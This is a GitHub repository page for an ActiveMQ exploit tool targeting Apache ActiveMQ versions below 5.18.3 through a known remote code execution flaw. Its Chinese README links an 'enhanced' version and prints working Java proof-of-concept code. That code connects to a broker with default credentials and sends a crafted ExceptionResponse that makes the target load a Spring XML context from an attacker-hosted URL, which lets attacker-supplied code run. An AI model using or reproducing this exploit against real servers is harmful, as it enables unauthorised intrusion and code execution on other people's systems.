Skip to content

JaneMandy/ActiveMQExploit

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

10 Commits
.idea
.idea
 
 
src
src
 
 
.gitignore
.gitignore
 
 
README.md
README.md
 
 
exp.iml
exp.iml
 
 
pics.gif
pics.gif
 
 

Repository files navigation

ActiveMQ 漏洞利用工具

0vercl0k

Apache ActiveMQ < 5.18.3 CNVD-2023-69477

加强版:https://github.com/JaneMandy/ActiveMQ_RCE_Pro_Max

加强版版本

v1.0.2

  • 添加代理
  • 去掉Help按钮

pics.gif

Vuln Ana Code:

package org.example;

import org.apache.activemq.ActiveMQConnectionFactory;
import org.apache.activemq.ActiveMQSession;
import org.apache.activemq.command.ExceptionResponse;
import org.springframework.context.support.ClassPathXmlApplicationContext;

import javax.jms.*;

public class Main {
    public static void main(String[] args) throws Exception {
        ConnectionFactory connectionFactory = new
                ActiveMQConnectionFactory("tcp://localhost:61616"); //目标地址

        Connection connection = connectionFactory.createConnection("admin", "admin");
        connection.start();
        ActiveMQSession session = (ActiveMQSession) connection.createSession();
        ExceptionResponse exceptionResponse = new ExceptionResponse();

        exceptionResponse.setException(new ClassPathXmlApplicationContext("http://127.0.0.1:8000/pom.xml"));

        session.syncSendPacket(exceptionResponse);
        
        connection.close();
    }
}

About

CNVD-2023-80853 Apache ActiveMQ < 5.18.3 RCE

Resources

Readme
Activity

Stars

19 stars

Watchers

1 watching

Forks

1 fork
Report repository

Releases 1

Release Latest
Oct 26, 2023

Packages

No packages published

Languages